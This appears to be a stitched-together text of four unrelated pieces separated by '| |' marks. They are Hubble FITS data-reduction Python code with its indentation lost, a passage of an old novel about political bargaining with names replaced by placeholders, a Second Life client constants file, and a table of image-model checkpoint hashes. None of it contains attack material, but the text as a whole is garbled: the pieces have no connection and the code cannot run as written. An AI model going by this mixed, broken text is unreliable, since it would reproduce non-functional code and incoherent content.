# Use an F814W file, but this should be updated
orig_file[0].header['NPOLFILE'] = 'jref$v971826jj_npl.fits'
if head['INSTRUME'] == 'WFPC2':
head['DETECTOR'] = 'WFPC2'
if (head['INSTRUME'] == 'WFC3') & (head['DETECTOR'] == 'IR')&extra_badpix:
bp = pyfits.open(os.path.join(os.getenv('iref'),
'badpix_spars200_Nov9.fits'))
if orig_file['DQ'].data.shape == bp[0].data.shape:
orig_file['DQ'].data |= bp[0].data
extra_msg += ' / bpix: $iref/badpix_spars200_Nov9.fits'
if crclean:
import lacosmicx
for ext in [1,2]:
print('Clean CRs with LACosmic, extension {0:d}'.format(ext))
sci = orig_file['SCI',ext].data
dq = orig_file['DQ',ext].data
crmask, clean = lacosmicx.lacosmicx(sci, inmask=None,
sigclip=4.5, sigfrac=0.3, objlim=5.0, gain=1.0,
readnoise=6.5, satlevel=65536.0, pssl=0.0, niter=4,
sepmed=True, cleantype='meanmask', fsmode='median',
psfmodel='gauss', psffwhm=2.5,psfsize=7, psfk=None,
psfbeta=4.765, verbose=False)
dq[crmask] |= 1024
sci[crmask] = 0
if verbose:
print('{0} -> {1} {2}'.format(orig_file.filename(), local_file, extra_msg))
### WFPC2
if '_c0' in file:
# point to FITS reference files
for key in ['MASKFILE', 'ATODFILE', 'BLEVFILE', 'BLEVDFIL', 'BIASFILE', 'BIASDFIL', 'DARKFILE', 'DARKDFIL', 'FLATFILE', 'FLATDFIL', 'SHADFILE']:
ref_file = '_'.join(head[key].split('.'))+'.fits'
orig_file[0].header[key] = ref_file.replace('h.fits', 'f.fits')
waiv = orig_file[0].header['FLATFILE']
orig_file[0].header['FLATFILE'] = waiv.replace('.fits', '_c0h.fits')
if not os.path.exists(''):
pass
#
# ## testing
# orig_file[0].header['FLATFILE'] = 'm341820ju_pfl.fits'
# Make sure has correct header keys
for ext in range(4):
if 'BUNIT' not in orig_file[ext+1].header:
orig_file[ext+1].header['BUNIT'] = 'COUNTS'
# Copy WFPC2 DQ file (c1m)
dqfile = os.path.join(path, file.replace('_c0', '_c1'))
print('Copy WFPC2 DQ file: {0}'.format(dqfile))
if os.path.exists(os.path.basename(dqfile)):
os.remove(os.path.basename(dqfile))
shutil.copy(dqfile, './')
## Add additional masking since AstroDrizzle having trouble with flats
flat_file = orig_file[0].header['FLATFILE'].replace('uref$', os.getenv('uref')+'/')
pfl = pyfits.open(flat_file)
c1m = pyfits.open(os.path.basename(dqfile), mode='update')
for ext in [1,2,3,4]:
mask = pfl[ext].data > 1.3
c1m[ext].data[mask] |= 2
c1m.flush()
orig_file.writeto(local_file, overwrite=True)
if mask_regions:
apply_region_mask(local_file, dq_value=1024)
def apply_persistence_mask(flt_file, path='../Persistence', dq_value=1024,
err_threshold=0.6, grow_mask=3, subtract=True,
verbose=True):
"""Make a mask for pixels flagged as being affected by persistence
Persistence products can be downloaded from https://archive.stsci.edu/prepds/persist/search.php, specifically the
"_persist.fits" files.
Parameters
----------
flt_file : str
Filename of the WFC3/IR FLT exposure
path : str
Path to look for the "persist.fits" file.
dq_value : int
DQ bit to flip for flagged pixels
err_threshold : float
Threshold for defining affected pixels:
flagged = persist > err_threshold*ERR
grow_mask : int
Factor by which to dilate the persistence mask.
subtract : bool
Subtract the persistence model itself from the SCI extension.
verbose : bool
Print information to the terminal
Returns
-------
Nothing, updates the DQ extension of `flt_file`.
"""
import scipy.ndimage as nd
flt = pyfits.open(flt_file, mode='update')
pers_file = os.path.join(path,
os.path.basename(flt_file).replace('_flt.fits', '_persist.fits'))
if not os.path.exists(pers_file):
if verbose:
print('Persistence file {0} not found'.format(pers_file))
#return 0
pers = pyfits.open(pers_file)
pers_mask = pers['SCI'].data > err_threshold*flt['ERR'].data
if grow_mask > 0:
pers_mask = nd.maximum_filter(pers_mask*1, size=grow_mask)
else:
pers_mask = pers_mask * 1
NPERS = pers_mask.sum()
if verbose:
print('{0}: flagged {1:d} pixels affected by persistence (pers/err={2:.2f})'.format(pers_file, NPERS, err_threshold))
if NPERS > 0:
flt['DQ'].data[pers_mask > 0] |= dq_value
if subtract:
dont_subtract=False
if 'SUBPERS' in flt[0].header:
if flt[0].header['SUBPERS']:
dont_subtract = True
if not dont_subtract:
flt['SCI'].data -= pers['SCI'].data
flt['ERR'].data = np.sqrt(flt['ERR'].data**2+pers['SCI'].data**2)
flt[0].header['SUBPERS'] = (True, 'Persistence model subtracted')
flt.flush()
def apply_region_mask(flt_file, dq_value=1024, verbose=True):
"""Apply DQ mask from a DS9 region file
Parameters
----------
flt_file : str
Filename of the FLT exposure
dq_value : int
DQ bit to flip for affected pixels
Searches for region files with filenames like
`flt_file.replace('_flt.fits','.[ext].mask.reg')`, where `[ext]` is an
integer referring to the SCI extension in the FLT file.
"""
import pyregion
mask_files = glob.glob(flt_file.replace('_flt.fits','.*.mask.reg').replace('_flc.fits','.*.mask.reg').replace('_c0m.fits','.*.mask.reg').replace('_c0f.fits','.*.mask.reg'))
if len(mask_files) == 0:
return True
if verbose:
print('Region mask for {0}: {1}'.format(flt_file, mask_files))
flt = pyfits.open(flt_file, mode='update')
for mask_file in mask_files:
ext = int(mask_file.split('.')[-3])
try:
reg = pyregion.open(mask_file).as_imagecoord(flt['SCI',ext].header)
mask = reg.get_mask(hdu=flt['SCI',ext])
except:
# Above fails for lookup-table distortion (ACS / UVIS)
# Here just assume the region file is defined in image coords
reg = pyregion.open(mask_file)
mask = reg.get_mask(shape=flt['SCI',ext].data.shape)
flt['DQ',ext].data[mask] |= dq_value
flt.flush()
return True
def apply_saturated_mask(flt_file, dq_value=1024):
"""Saturated WFC3/IR pixels have some pulldown in the opposite amplifier
Parameters
----------
flt_file : str
Filename of the FLT exposure
dq_value : int
DQ bit to flip for | |
progress and that neither party to it was inclined to give in
a single point.
Of course, he decided, the subject was the coming election campaign, but
the details of desired bargaining he could not gather.
Moreover, often, just as he almost heard sentences of interest, the
chatter of the girls or some remark of Mrs. Wheeler’s would drown the
voices of the men in the room.
One time, indeed, he heard clearly: “When the Sycamore on the ridge goes
into Massachusetts——” but this was sheer nonsense, and he concluded he
must have misunderstood.
Later, they all forgathered in the living-room and there was music and
general conversation.
<NAME> proved herself decidedly entertaining, and though Samuel
Appleby looked a little amusedly at his stenographer, he smiled kindly at
her as he noticed that she in no way overstepped the bounds of correct
demeanor.
Genevieve was thinking of what Keefe had said to her: “If you do only
what is absolutely correct and say what is only absolutely correct, you
can do whatever you like.”
She had called it nonsense at the time, but she was beginning to see the
truth of it. She was careful that her every word and act should be
correct, and she was most decidedly doing as she liked. She made good
with Mrs. Wheeler and Maida with no trouble at all; but she felt,
vaguely, that Mr. Wheeler didn’t like her. This she set about to remedy.
Going to his side, as he chanced to sit for a moment alone, she smiled
ingratiatingly and said:
“I wonder if you can imagine, sir, what it means to me to see the inside
of a house like this?”
“Bless my soul, what do you mean?” asked Wheeler, puzzled at the girl’s
manner.
“It’s like a glimpse of Fairyland,” she went on. “You see, I’m terribly
ambitious—oh, fearfully so! And all my ambitions lead to just this sort
of a home. Do you suppose I’ll ever achieve it, Mr. Wheeler?”
Now the girl had truly wonderful magnetic charm, and even staid old Dan
Wheeler was not insensible to the note of longing in her voice, the
simple, honest admission of her hopes.
“Of course you will, little one,” he returned, kindly. “I’ve heard that
whatever one wants, one gets, provided the wish is strong enough.” He
spoke directly to her, but his gaze wandered as if his thoughts were far
away.
“Do you really believe that?” Genevieve’s big blue eyes begged an
affirmation.
“I didn’t say I believed it—I said I have heard it.” He smiled sadly.
“Not quite the same—so far as I’m concerned; but quite as assuring to
you. Of course, my belief wouldn’t endorse the possibility.”
“It would for me,” declared Genevieve. “I’ve lots of confidence in other
people’s opinions——”
“Anybody’s?”
“Anybody whom I respect and believe in.”
“Appleby, for instance?”
“Oh, yes, indeed! I’d trust Mr. Appleby’s opinions on any subject. Let’s
go over there and tell him so.”
<NAME> was sitting at the other end, the north end of the long
room. “No,” said Wheeler, “I’m too comfortable here to move—ask him to
come here.”
Genevieve looked at him a little astonished. It was out of order, she
thought, for a host to speak thus. She pressed the point, saying there
was a picture at the other end of the room she wished to examine.
“Run along, then,” said Wheeler, coolly. “Here, Maida, show <NAME>
that etching and tell her the interesting details about it.”
The girls went away, and soon after Keefe drifted round to Wheeler’s
side.
“You know young <NAME>?” he asked, casually.
“No,” Wheeler said, shortly but not sharply. “I daresay he’s a most
estimable chap.”
“He’s all of that. He’s a true chip of the old block. Both good
gubernatorial timber, as I’m sure you agree.”
“What makes you so sure, Mr. Keefe?”
<NAME> looked straight at him. “Well,” he laughed, “I’m quite ready
to admit that the wish was father to the thought.”
“Why do you call that an admission?”
“Oh,” Keefe readily returned, “it is usually looked upon as a confession
that one has no reason for a thought other than a wish.”
“And why is it your wish?”
“Because it is the wish of my employer,” said Keefe, seriously. “I know
of no reason, <NAME>, why I shouldn’t say that I hope and trust you
will use your influence to further the cause of young Appleby.”
“What makes you think I can do so?”
“While I am not entirely in <NAME>’s confidence, he has told me that
the campaign would be greatly aided by your willingness to help, and so I
can’t help hoping you will exercise it.”
“Appleby has told you so much, has he? No more?”
“No more, I think, regarding yourself, sir. I know, naturally, the
details of the campaign so far as it is yet mapped out.”
“And you know why I do not want to lend my aid?”
“I know you are not in accordance with the principles of the Appleby
politics——”
“That I am not! Nor shall I ever be. Nor shall I ever pretend to be——”
“Pretend? Of course not. But could you not be persuaded?”
“By what means?”
“I don’t know, <NAME>,” and Keefe looked at him frankly. “I truly
don’t know by what means. But I do know that Mr. Appleby is here to
present to you an argument by which he hopes to persuade you to help
young Sam along—and I earnestly desire to add any word of mine that may
help influence your decision. That is why I want to tell you of the good
traits of <NAME>, junior. It may be I can give you a clearer light
on his character than his father could do——that is, I might present it as
the opinion of a friend——”
“And not exaggerate his virtues as a father might do? I see. Well, Mr.
Keefe, I appreciate your attitude, but let me tell you this: whatever I
do or don’t do regarding this coming campaign of young Appleby will be
entirely irrespective of the character or personality of that young man.
It will all depend on the senior Appleby’s arrangements with me, and my
ability to change his views on some of the more important planks in his
platform. If he directed you to speak to me as you have done, you may
return that to him as my answer.”
“You, doubtless, said the same to him, sir?”
“Of course I did. I make no secret of my position in this matter. <NAME> has a hold over me—I admit that—but it is not strong enough to
make me forget my ideas of right and wrong to the public. No influence of
a personal nature should weigh against any man’s duty to the state, and I
will never agree to pretend to any dissimulation in order to bring about
a happier life for myself.”
“But need you subscribe to the objectionable points to use your influence
for young Sam?”
“Tacitly, of course. And I do not choose even to appear to agree to
principles abhorrent to my sense of justice and honesty, thereby secretly
gaining something for myself.”
“Meaning your full pardon?”
Wheeler turned a look of surprise on the speaker.
“I thought you said you hadn’t Appleby’s full confidence,” he said.
“Nor have I. I do know—as do many men—that you were pardoned with a
condition, but the condition I do not know. It can’t be very galling.”
And Keefe looked about on the pleasant surroundings.
“You think not? That’s because you don’t know the terms. And yet, galling
though they are, hateful though it makes my life, and the lives of my
wife and daughter, we would all rather bear it than to deviate one iota
from the path of strict right.”
“I must admire you for that, as must any honorable man. But are there not
degrees or shadings of right and wrong——”
“Mr. Keefe, as an old man, I take the privilege of advising you for your
own good. All through your life I beg you remember this: Anyone who
admits degrees or shadings of right or wrong—is already wrong. Don’t be
offended; you didn’t claim those things, you merely asked the question.
But, remember what I said about it.”
CHAPTER III
ONE LAST ARGUMENT
Adjoining the bedroom of <NAME> at Sycamore Ridge was a small
sitting-room, also at his disposal. Here, later that same evening he sat
in confab | |
<reponame>FelixWolf/pyverse<gh_stars>1-10
class constraints:
constraints = {
#http://wiki.secondlife.com/wiki/SimStats
#Ratio of time passage in region to real time passage.
"LL_SIM_STAT_TIME_DILATION": 0,
#Number of timesteps taken per second, rolling scale. Perfect is 45.0
"LL_SIM_STAT_FPS": 1,
#Number of timesteps taken in the physics engine per second, rolling scale. Perfect is 45.0
"LL_SIM_STAT_PHYSFPS": 2,
#Number of updates sent for agent objects per second. Should be one for every main agent and child agent connected to the region.
"LL_SIM_STAT_AGENTUPS": 3,
#Number of milliseconds spent processing each frame(Sum of all others). Averaged over each second. Should ideally be below 25.0
"LL_SIM_STAT_FRAMEMS": 4,
#Number of milliseconds spent processing network messages or connections. Averaged over each second. Should ideally be below 5.0
"LL_SIM_STAT_NETMS": 5,
#Number of milliseconds spent doing "other" things. Averaged over each second. Should ideally be below 5.0
"LL_SIM_STAT_SIMOTHERMS": 6,
#Number of milliseconds spent inside the physics engine(Sum of physics times.) Averaged over each second. Should ideally be below 10.0
"LL_SIM_STAT_SIMPHYSICSMS": 7,
#Number of milliseconds spent calculating agent visibility, interest lists, status, and preparing physical entity. Averaged over each second. Should ideally be below 5.0
"LL_SIM_STAT_AGENTMS": 8,
#Number of milliseconds spent processing image data, separating discard levels, decoding images. Averaged over each second. Should ideally be below 3.0
"LL_SIM_STAT_IMAGESMS": 9,
#Number of milliseconds spent running scripts and updating script states. Averaged over each second. Should ideally be below 25.0
"LL_SIM_STAT_SCRIPTMS": 10,
#Number of prims(tasks) within the region, including temporary tasks.
"LL_SIM_STAT_NUMTASKS": 11,
#Number of prims(tasks) that are active(physical, have scripts, changing status, being stood on.)
"LL_SIM_STAT_NUMTASKSACTIVE": 12,
#Number of agents that are within the region
"LL_SIM_STAT_NUMAGENTMAIN": 13,
#Number of agents that are not located within the region but can see into it.(Looking into the region from another region.)
"LL_SIM_STAT_NUMAGENTCHILD": 14,
#Number of scripts that are loaded onto tasks and set to running within the region. Scripts no set to running do not count towards this value.
"LL_SIM_STAT_NUMSCRIPTSACTIVE": 15,
#Number of LSL virtual machine instructions executed within the last second.
"LL_SIM_STAT_LSLIPS": 16,
#Number of packets simulator received that were related to the region in the last second.
"LL_SIM_STAT_INPPS": 17,
#Number of packets sent by the region in the last second.
"LL_SIM_STAT_OUTPPS": 18,
#Number of asset download requests waiting for a response.
"LL_SIM_STAT_PENDING_DOWNLOADS": 19,
#Number of asset upload requests waiting for authorization, response or to complete transfer.
"LL_SIM_STAT_PENDING_UPLOADS": 20,
#Unknown. Number of locally stored assets trying to transfer to another sim?(Skin bakes.)
"LL_SIM_STAT_PENDING_LOCAL_UPLOADS": 23,
#Number of kilobytes of network messages that have yet to be acknowledged. Ideally below 1000.
"LL_SIM_STAT_TOTAL_UNACKED_BYTES": 24,
#Number of prims that are marked as pinned within the physics system. Usually 0.
"LL_SIM_STAT_PHYSICS_PINNED_TASKS": 25,
#Number of prims that have had their level of detail reduced to help alleviate physics load. Ideally 0.
"LL_SIM_STAT_PHYSICS_LOD_TASKS": 26,
#Number of milliseconds spent running the physics time step. Averaged over a second. Ideally should be below 15.0
"LL_SIM_STAT_SIMPHYSICSSTEPMS": 27,
#Number of milliseconds spent updating the physical shape of an object. Averaged over a second. Ideally should be below 3.0
"LL_SIM_STAT_SIMPHYSICSSHAPEMS": 28,
#Number of milliseconds spent inside the physics engine not updating shapes or running physics step. Averaged over a second. Ideally should be below 3.0
"LL_SIM_STAT_SIMPHYSICSOTHERMS": 29,
#Number of megabytes of RAM allocated on the simulator for physics.
"LL_SIM_STAT_SIMPHYSICSMEMORY": 30,
#Damage system forced to on for entire region.
"REGION_FLAGS_ALLOW_DAMAGE": 0x01,
#If agents can create landmarks anywhere within the region.(Forced on)
"REGION_FLAGS_ALLOW_LANDMARK": 0x02,
#If agents can set their home location to anywhere within the region.(Forced on)
"REGION_FLAGS_ALLOW_SET_HOME": 0x04,
#If agents home location is set to the destination upon teleporting out of the region.
"REGION_FLAGS_RESET_HOME_ON_TELEPORT": 0x08,
#If the sun should not move with time.
"REGION_FLAGS_SUN_FIXED": 0x10,
#If taxes should not apply to this region.(Deprecated)
"REGION_FLAGS_TAX_FREE": 0x20,
#Land cannot be changed anywhere within the region. Trees and plants may still be placed.
"REGION_FLAGS_BLOCK_TERRAFORM": 0x40,
#Land cannot be released, sold, or bought within the entire region.
"REGION_FLAGS_BLOCK_LAND_RESELL": 0x80,
#Region is a sandbox and is wiped every 12 hours.(Appears deprecated.)
"REGION_FLAGS_SANDBOX": 0x100,
#Unknown: Related to the availability of an overview world map tile.(Think mainland images when zoomed out.)
"REGION_FLAGS_NULL_LAYER": 0x200,
#Unknown: Related to region debug flags. Possibly to skip processing of agent interaction with world.
"REGION_FLAGS_SKIP_AGENT_ACTION": 0x400,
#Region does not update agent prim interest lists. Internal debugging option.
"REGION_FLAGS_SKIP_UPDATE_INTEREST_LIST": 0x800,
#Makes all objects phantom and or pins them in place, does not affect agents.
"REGION_FLAGS_SKIP_COLLISIONS": 0x1000,
#Region does not run scripts, affects whole region.
"REGION_FLAGS_SKIP_SCRIPTS": 0x2000,
#Region does not run physics timesteps. All objects are frozen, including agents.
"REGION_FLAGS_SKIP_PHYSICS": 0x4000,
#Region can be seen from other regions on world map. (Legacy world map option?)
"REGION_FLAGS_EXTERNALLY_VISIBLE": 0x8000,
#Region can be seen from mainland on world map. (Legacy world map option?)
"REGION_FLAGS_MAINLAND_VISIBLE": 0x10000,
#Agents not explicitly on the access list can visit the region.
"REGION_FLAGS_PUBLIC_ALLOWED": 0x20000,
#Traffic calculations are not run across entire region, overrides parcel settings.
"REGION_FLAGS_BLOCK_DWELL": 0x40000,
#Flight is disabled for the entire region, overrides parcel settings.
"REGION_FLAGS_BLOCK_FLY": 0x80000,
#If teleports are allowed to exactly locations, if not on, agent is routed to nearest telehub. Overrides parcel settings.
"REGION_FLAGS_ALLOW_DIRECT_TELEPORT": 0x100000,
#Region is not running scripts, persisted in database. Set on an estate level.
"REGION_FLAGS_ESTATE_SKIP_SCRIPTS": 0x200000,
#Restricts the usage of the LSL llPushObject function, applies to whole region.
"REGION_FLAGS_RESTRICT_PUSHOBJECT": 0x400000,
#Denys "hackers on steroids" with no payment info from entering the region.
"REGION_FLAGS_DENY_ANONYMOUS": 0x800000,
#Denys agents with payment info from entering the region.(Legacy removed option.)
"REGION_FLAGS_DENY_IDENTIFIED": 0x1000000,
#Denys agents with payment info that has been used from entering the region.(Legacy removed option.)
"REGION_FLAGS_DENY_TRANSACTED": 0x2000000,
#Parcels within the region may be joined or divided by anyone, not just estate owners/managers.
"REGION_FLAGS_ALLOW_PARCEL_CHANGES": 0x4000000,
#Abuse reports sent from within this region are sent to the estate owner defined email.
"REGION_FLAGS_ABUSE_EMAIL_TO_ESTATE_OWNER": 0x8000000,
#Voice can be enabled within the region.
"REGION_FLAGS_ALLOW_VOICE": 0x10000000,
#Removes the ability from parcel owners to set their parcels to show in search.
"REGION_FLAGS_BLOCK_PARCEL_SEARCH": 0x20000000,
#Denys agents who have not been age verified from entering the region.
"REGION_FLAGS_DENY_AGEUNVERIFIED": 0x40000000,
#OpenMetaverse/AgentManager.cs
#Placeholder for empty values, shouldn't ever see this
"PERMISSION_NONE": 0,
#Script wants ability to take money from you
"PERMISSION_DEBIT": 1,
#Script wants to take camera controls for you
"PERMISSION_TAKECONTROLS": 2,
#Script wants to remap avatars controls
"PERMISSION_REMAPCONTROLS": 4,
#Script wants to trigger avatar animations
"PERMISSION_TRIGGERANIMATION": 8,
#Script wants to attach or detach the prim or primset to your avatar
"PERMISSION_ATTACH": 16,
#Script wants permission to release ownership
"PERMISSION_RELEASEOWNERSHIP": 32,
#Script wants ability to link/delink with other prims
"PERMISSION_CHANGELINKS": 64,
#Script wants permission to change joints
"PERMISSION_CHANGEJOINTS": 128,
#Script wants permissions to change permissions
"PERMISSION_CHANGEPERMISSIONS": 256,
#Script wants to track avatars camera position and rotation
"PERMISSION_TRACKCAMERA": 512,
#Script wants to control your camera
"PERMISSION_CONTROLCAMERA": 1024,
#Script wants the ability to teleport you
"PERMISSION_TELEPORT": 4096,
#Indicates a regular IM from another agent
"IM_MESSAGEFROMAGENT": 0,
#Simple notification box with an OK button
"IM_MESSAGEBOX": 1,
#Used to show a countdown notification with an OK button, deprecated now
"IM_MESSAGEBOXCOUNTDOWN": 2,
#You've been invited to join a group.
"IM_GROUPINVITATION": 3,
#Inventory offer
"IM_INVENTORYOFFERED": 4,
#Accepted inventory offer
"IM_INVENTORYACCEPTED": 5,
#Declined inventory offer
"IM_INVENTORYDECLINED": 6,
#Group vote
"IM_GROUPVOTE": 7,
#A message to everyone in the agent's group, no longer used
"IM_DEPRECATEDGROUPMESSAGE": 8,
#An object is offering its inventory
"IM_TASKINVENTORYOFFERED": 9,
#Accept an inventory offer from an object
"IM_TASKINVENTORYACCEPTED": 10,
#Decline an inventory offer from an object
"IM_TASKINVENTORYDECLINED": 11,
#Unknown
"IM_NEWUSERDEFAULT": 12,
#Start a session, or add users to a session
"IM_SESSIONADD": 13,
#Start a session, but don't prune offline users
"IM_SESSIONOFFLINEADD": 14,
#Start a session with your group
"IM_SESSIONGROUPSTART": 15,
#Start a session without a calling card (finder or objects)
"IM_SESSIONCARDLESSSTART": 16,
#Send a message to a session
"IM_SESSIONSEND": 17,
#Leave a session
"IM_SESSIONDROP": 18,
#Indicates that the IM is from an object
"IM_MESSAGEFROMOBJECT": 19,
#Sent an IM to a busy user, this is the auto response
"IM_BUSYAUTORESPONSE": 20,
#Shows the message in the console | |
'v0.0.524'),
('resnetd50b', '0550', '7ba88f0436b3fa598520424bb463ac985ffb0caf', 'v0.0.296'),
('resnetd101b', '0460', 'b90f971e4514345fb885de95165ddcc4e6610234', 'v0.0.296'),
('resnetd152b', '0470', '41442334cde93c9744d2a86288d11614c848503a', 'v0.0.296'),
('nin_cifar10', '0743', '045abfde63c6b73fbb1b6c6b062c9da5e2485750', 'v0.0.175'),
('nin_cifar100', '2839', '891047637c63f274d4138a430fcaf5f92f054ad4', 'v0.0.183'),
('nin_svhn', '0376', '2fbe48d0dd165c97acb93cf0edcf4b847651e3a0', 'v0.0.270'),
('resnet20_cifar10', '0597', '15145d2e00c85b5c295b6999068ce4b494febfb0', 'v0.0.163'),
('resnet20_cifar100', '2964', '6a85f07e9bda4721ee68f9b7350250b866247324', 'v0.0.180'),
('resnet20_svhn', '0343', 'b6c1dc9982e1ee04f089ca02d5a3dbe549b18c02', 'v0.0.265'),
('resnet56_cifar10', '0452', 'eb7923aa7d53e4e9951483b05c9629010fbd75a4', 'v0.0.163'),
('resnet56_cifar100', '2488', '2d641cdef73a9cdc440d7ebfb665167907a6b3bd', 'v0.0.181'),
('resnet56_svhn', '0275', 'cf18a0720e4e73e5d36832e24a36b78351f9c266', 'v0.0.265'),
('resnet110_cifar10', '0369', '27d76fce060ce5737314f491211734bd10c60308', 'v0.0.163'),
('resnet110_cifar100', '2280', 'd2ec4ff1c85095343031a0b11a671c4799ae1187', 'v0.0.190'),
('resnet110_svhn', '0245', 'f274056a4f3b187618ab826aa6e3ade028a3a4da', 'v0.0.265'),
('resnet164bn_cifar10', '0368', 'd86593667f30bfef0c0ad237f2da32601b048312', 'v0.0.179'),
('resnet164bn_cifar100', '2044', '190ab6b485404e43c41a85542e57adb051744aa0', 'v0.0.182'),
('resnet164bn_svhn', '0242', 'b4c1c66ccc47f0802058fcd469844811f214bbca', 'v0.0.267'),
('resnet272bn_cifar10', '0333', 'b7c6902a5e742b2c46c9454be5962f9a5e5a0fa5', 'v0.0.368'),
('resnet272bn_cifar100', '2007', 'fe6b27f8b18785d568719dfbaea79ae05eb0aefe', 'v0.0.368'),
('resnet272bn_svhn', '0243', '693d5c393d2823146a1bdde0f8b11bb21ccd8c12', 'v0.0.368'),
('resnet542bn_cifar10', '0343', 'b6598e7a0e5bd800b4425424b43274a96677e77b', 'v0.0.369'),
('resnet542bn_cifar100', '1932', '4f95b380a755ae548187bfa0da038565c50e1e26', 'v0.0.369'),
('resnet542bn_svhn', '0234', '7421964d2246a7b5ba7f9baf294cc3bd06329ad8', 'v0.0.369'),
('resnet1001_cifar10', '0328', '0e27556cdc97b7d0612d4518546a9b0479e030c3', 'v0.0.201'),
('resnet1001_cifar100', '1979', '6416c8d2f86debf42f1a3798e4b53fa8d94b0347', 'v0.0.254'),
('resnet1001_svhn', '0241', 'c8b23d4c50359cac2fbd837ed754cc4ea7b3b060', 'v0.0.408'),
('resnet1202_cifar10', '0353', 'd82bb4359d16e68989547f8b1153c8f23264e46c', 'v0.0.214'),
('resnet1202_cifar100', '2156', '711136021e134b4180cc49c7bb1dda2bd0d4ab49', 'v0.0.410'),
('preresnet20_cifar10', '0651', '5cf94722c7969e136e2174959fee4d7b95528f54', 'v0.0.164'),
('preresnet20_cifar100', '3022', 'e3fd9391a621da1afd77f1c09ae0c9bdda4e17aa', 'v0.0.187'),
('preresnet20_svhn', '0322', '8e56898f75a9ba2c016b1e14e880305e55a96ea7', 'v0.0.269'),
('preresnet56_cifar10', '0449', '73ea193a6f184d034a4b5b911fe6d23473eb0220', 'v0.0.164'),
('preresnet56_cifar100', '2505', 'f879fb4e9c9bc328b97ca8999575ea29343bbd79', 'v0.0.188'),
('preresnet56_svhn', '0280', 'f512407305efa862c899a56cfc86003ee9ca0e9f', 'v0.0.269'),
('preresnet110_cifar10', '0386', '544ed0f0e0b3c0da72395924e2ea381dbf381e52', 'v0.0.164'),
('preresnet110_cifar100', '2267', '4e010af04fefb74f6535a1de150f695460ec0550', 'v0.0.191'),
('preresnet110_svhn', '0279', '8dcd3ae54540a62f6a9b87332f0aa2abfc587600', 'v0.0.269'),
('preresnet164bn_cifar10', '0364', 'c0ff243801f078c6e6be72e1d3b67d88d61c4454', 'v0.0.196'),
('preresnet164bn_cifar100', '2018', '5228dfbdebf0f4699dae38a4a9b8310b08189d48', 'v0.0.192'),
('preresnet164bn_svhn', '0258', '69de71f53eee796710e11dae53f10ed276588df0', 'v0.0.269'),
('preresnet272bn_cifar10', '0325', '8f8f375dfca98fb0572b2de63ca3441888c52a88', 'v0.0.389'),
('preresnet272bn_cifar100', '1963', '52a0ebabfa75366e249e612b9556c87618acf41e', 'v0.0.389'),
('preresnet272bn_svhn', '0234', 'b2cc8842932feb8f04547d5341f00ef2a3846d8a', 'v0.0.389'),
('preresnet542bn_cifar10', '0314', '86a2b5f51c4e8064ba3093472a65e52e4d65f6be', 'v0.0.391'),
('preresnet542bn_cifar100', '1871', 'd7343a662a78d29fe14f98e7dba6d79096f43904', 'v0.0.391'),
('preresnet542bn_svhn', '0236', '67f372d8a906e75f2aa3a32396e757851fd6e1fd', 'v0.0.391'),
('preresnet1001_cifar10', '0265', '1f3028bdf7143b8f99340b1b1a0a8e029d7020a0', 'v0.0.209'),
('preresnet1001_cifar100', '1841', 'fcbddbdb462da0d77c50026878ea2cfb6a95f5d4', 'v0.0.283'),
('preresnet1202_cifar10', '0339', 'cc2bd85a97842f7a444deb78262886a264a42c25', 'v0.0.246'),
('resnext29_32x4d_cifar10', '0315', '442eca6c30448563f931174d37796c2f08c778b7', 'v0.0.169'),
('resnext29_32x4d_cifar100', '1950', 'de139852f2876a04c74c271d50f0a50ba75ece3e', 'v0.0.200'),
('resnext29_32x4d_svhn', '0280', '0a402faba812ae0b1238a6da95adc734a5a24f16', 'v0.0.275'),
('resnext29_16x64d_cifar10', '0241', 'e80d3cb5f8d32be2025fe8fb7a7369b2d004217e', 'v0.0.176'),
('resnext29_16x64d_cifar100', '1693', '762f79b3506528f817882c3a47252c2f42e9376b', 'v0.0.322'),
('resnext29_16x64d_svhn', '0268', '04ffa5396ae4a61e60a30f86cd5180611ce94772', 'v0.0.358'),
('resnext272_1x64d_cifar10', '0255', '1ca6630049e54d9d17887c0af26ab6f848d30067', 'v0.0.372'),
('resnext272_1x64d_cifar100', '1911', '9a9b397c1091c6bd5b0f4b13fb6567a99d7aa7ac', 'v0.0.372'),
('resnext272_1x64d_svhn', '0235', 'b12f9d9ce073c72c2e5509a27a5dd065a7b5d05f', 'v0.0.372'),
('resnext272_2x32d_cifar10', '0274', '94e492a4391e589e6722a91ddc8b18df4dc89ed0', 'v0.0.375'),
('resnext272_2x32d_cifar100', '1834', 'bbc0c87cad70745f2aa86241521449ab7f9fd3bf', 'v0.0.375'),
('resnext272_2x32d_svhn', '0244', 'd9432f639120985968afc9b1bdde666ceaad53c9', 'v0.0.375'),
('seresnet20_cifar10', '0601', '143eba2ad59cc9f7e539d97445eb4fe13aad1a6e', 'v0.0.362'),
('seresnet20_cifar100', '2854', '1240e42f79500ddca2e471f543ff1aa28f20af16', 'v0.0.362'),
('seresnet20_svhn', '0323', '6c611f0a860d7a0c161602bfc268ccb8563376ee', 'v0.0.362'),
('seresnet56_cifar10', '0413', '66486cdbab43e244883ca8f26aa93da2297f9468', 'v0.0.362'),
('seresnet56_cifar100', '2294', 'ab7e54434bdee090f0694d3ba96122c441b7753b', 'v0.0.362'),
('seresnet56_svhn', '0264', '0a017d76364bb219b35aa2a792291acb1554e251', 'v0.0.362'),
('seresnet110_cifar10', '0363', '9a85ff9521387e1155437e691d5ccb411b28e441', 'v0.0.362'),
('seresnet110_cifar100', '2086', '298d298ea6747ff9f9277be08838f723c239e4e3', 'v0.0.362'),
('seresnet110_svhn', '0235', '525399af7c6f717aabc6c1c024c863191a1a28d9', 'v0.0.362'),
('seresnet164bn_cifar10', '0339', '4c59e76fc3264532142b37db049d3ff422b6d5f4', 'v0.0.362'),
('seresnet164bn_cifar100', '1995', 'cdac82fd3133bfd4d8cd261016a68fe95928ea4b', 'v0.0.362'),
('seresnet164bn_svhn', '0245', '31e8d2beeeb74a444ff756cafc7f1b557009cddc', 'v0.0.362'),
('seresnet272bn_cifar10', '0339', '8081d1be9a5eb985c828b6f60e41b3d689c84659', 'v0.0.390'),
('seresnet272bn_cifar100', '1907', 'a83ac8d69535cfb394be7e790ff9683d65e2b3f9', 'v0.0.390'),
('seresnet272bn_svhn', '0238', '2b28cd779296d2afbb789cee7b73a80b4b07e4a9', 'v0.0.390'),
('seresnet542bn_cifar10', '0347', 'e67d0c059a4f5c2e97790eb50d03013430f5a2fd', 'v0.0.385'),
